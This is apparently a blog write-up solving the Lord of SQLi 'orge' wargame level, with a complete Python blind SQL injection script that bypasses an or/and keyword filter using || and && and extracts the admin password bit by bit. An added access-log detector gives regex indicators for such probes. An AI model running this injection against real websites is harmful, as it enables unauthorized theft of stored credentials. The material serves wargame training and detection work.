    LOS - orge / level 7
    Web/SQLI  2024. 6. 23. 19:14

    Problem

    Solution

    if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
    if(preg_match('/or|and/i', $_GET[pw])) exit("HeHe");


    The filter rejects `or` and `and` (case-insensitive) in the value of pw, along with `prob`, `_`, `.` and `()`; the operator forms `||` and `&&` are not blocked.


    The level is solved by submitting admin's real pw value.


    So we recover that value with a blind SQL injection.

    Answer


    ?pw=7b751aec

    Code used

    I solved the problem by writing a script with python requests.


    import requests

    url = "input your url"                          # placeholder: base URL of the challenge page
    cookie = {"cookie name": "input your cookie"}   # placeholder: session cookie as a dict
    user = 'input find user'                        # placeholder: id whose pw is extracted (admin here)


    def change_bit(array):
        # convert each 8-character bit string ("01100001") to its integer value
        return [int(bits, 2) for bits in array]


    def change_str(array):
        # convert a list of integer byte values to a string
        return "".join(chr(value) for value in array)


    def find_length(url, user, cookie):
        # raise i until length(pw) > i stops being true; i is then the length
        i = 1
        while True:
            params = f"?pw=%27%20||%20id=%27{user}%27%20%26%26%20length(pw) > {i}%23"
            send_url = url + params
            print(f"Params = {params}")
            res = requests.get(send_url, cookies=cookie)
            if "Hello admin" not in res.text:
                break
            i += 1
        print(f"{user} Length = {i}")
        return i


    def blind(url, user, cookie, length):
        # for each position, test the 8 bits one by one with ascii(substr(pw,i,1)) & 2**count
        results = []
        for i in range(1, length + 1):
            k = 2
            result = ""
            for count in range(8):
                go = k ** count
                params = f"?pw=%27%20||%20id=%27{user}%27%20%26%26%20ascii(substr(pw,{i},1)) %26 {go}%23"
                send_url = url + params
                res = requests.get(send_url, cookies=cookie)
                if "Hello admin" in res.text:
                    result = "1" + result   # bit set; prepend so the MSB ends up first
                else:
                    result = "0" + result
            print(f"{i} : {result}")
            results.append(result)
        # convert the collected bit strings once, after every position is known
        return change_str(change_bit(results))


    print("Find User Length")
    length = find_length(url, user, cookie)

    array = blind(url, user, cookie, length)

    print(array)
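The probes above have a very recognisable shape once the query string is decoded (a quote that closes the string, `||`/`&&` in place of the filtered `or`/`and`, `length()` or `ascii(substr())` as the oracle, a trailing `#`), and a defender can flag them in web-server access logs. The following detector is an added example, not code from the write-up or from LOS; the log lines are constructed and the path `/orge.php` is an assumed name.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not real traffic): two probes shaped like the
# write-up's payloads from one client, and one ordinary login attempt from another.
SAMPLE_LOG = """\
10.0.0.5 - - [23/Jun/2024:19:14:01 +0900] "GET /orge.php?pw=%27%20%7C%7C%20id%3D%27admin%27%20%26%26%20length%28pw%29%20%3E%201%23 HTTP/1.1" 200 512
10.0.0.5 - - [23/Jun/2024:19:14:02 +0900] "GET /orge.php?pw=%27%20%7C%7C%20id%3D%27admin%27%20%26%26%20ascii%28substr%28pw%2C1%2C1%29%29%20%26%201%23 HTTP/1.1" 200 512
10.0.0.9 - - [23/Jun/2024:19:15:07 +0900] "GET /orge.php?pw=hunter2 HTTP/1.1" 200 498
"""

# Common log format: client ip, then the request line in quotes.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*"')

# Indicators taken from the payload shape in the write-up.
INDICATORS = [
    re.compile(r"'\s*\|\|"),                        # quote closes the string, OR written as ||
    re.compile(r"&&"),                              # AND written as && to pass /or|and/i
    re.compile(r"ascii\s*\(\s*substr\s*\(", re.I),  # per-character bit oracle
    re.compile(r"length\s*\(", re.I),               # length probing
    re.compile(r"#\s*$"),                           # trailing comment discards the rest
]

def score_request(path: str) -> int:
    """Count how many blind-SQLi indicators the decoded query values match."""
    values = [v for vals in parse_qs(urlsplit(path).query).values() for v in vals]
    decoded = " ".join(values)  # parse_qs already percent-decodes, so %26%26 -> &&
    return sum(1 for rx in INDICATORS if rx.search(decoded))

def detect(log_text: str, min_score: int = 2) -> dict:
    """Return {client ip: number of requests scoring >= min_score}."""
    hits = Counter()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and score_request(m.group("path")) >= min_score:
            hits[m.group("ip")] += 1
    return dict(hits)

if __name__ == "__main__":
    print(detect(SAMPLE_LOG))  # {'10.0.0.5': 2}
```

A single probe already scores 4 of 5 here, and the per-client count rises by one per request, so the 8-requests-per-character rhythm of the extraction shows up as a burst from one address.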
